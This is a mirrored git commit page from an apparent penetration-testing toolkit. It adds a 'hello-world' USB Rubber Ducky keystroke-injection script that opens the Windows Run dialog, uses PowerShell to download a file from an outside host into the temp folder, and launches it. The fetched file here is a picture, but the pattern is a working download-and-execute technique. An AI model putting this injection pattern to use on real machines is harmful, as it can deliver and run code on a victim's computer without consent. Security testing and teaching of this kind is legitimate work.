mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-08-10 15:40:20 -04:00
some small fixes
This commit is contained in:
parent
4f8d5148af
commit
16757b10ac
412 changed files with 139509 additions and 0 deletions
|
@ -0,0 +1,8 @@
|
|||
REM dowload and open an picture
|
||||
DELAY 3000
|
||||
GUI r
|
||||
DELAY 100
|
||||
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://mariwahl.us/figs/sn.png','%TEMP%\CRAZY_IMAGE.png');
|
||||
DELAY 100
|
||||
STRING Start-Process "%TEMP%\CRAZY_IMAGE.png"
|
||||
ENTER
|
BIN
Rubber_Duck/bt3gl/windows/hello-world/example2/inject.bin
Normal file
BIN
Rubber_Duck/bt3gl/windows/hello-world/example2/inject.bin
Normal file
Binary file not shown.
Loading…
Add table
Add a link
Reference in a new issue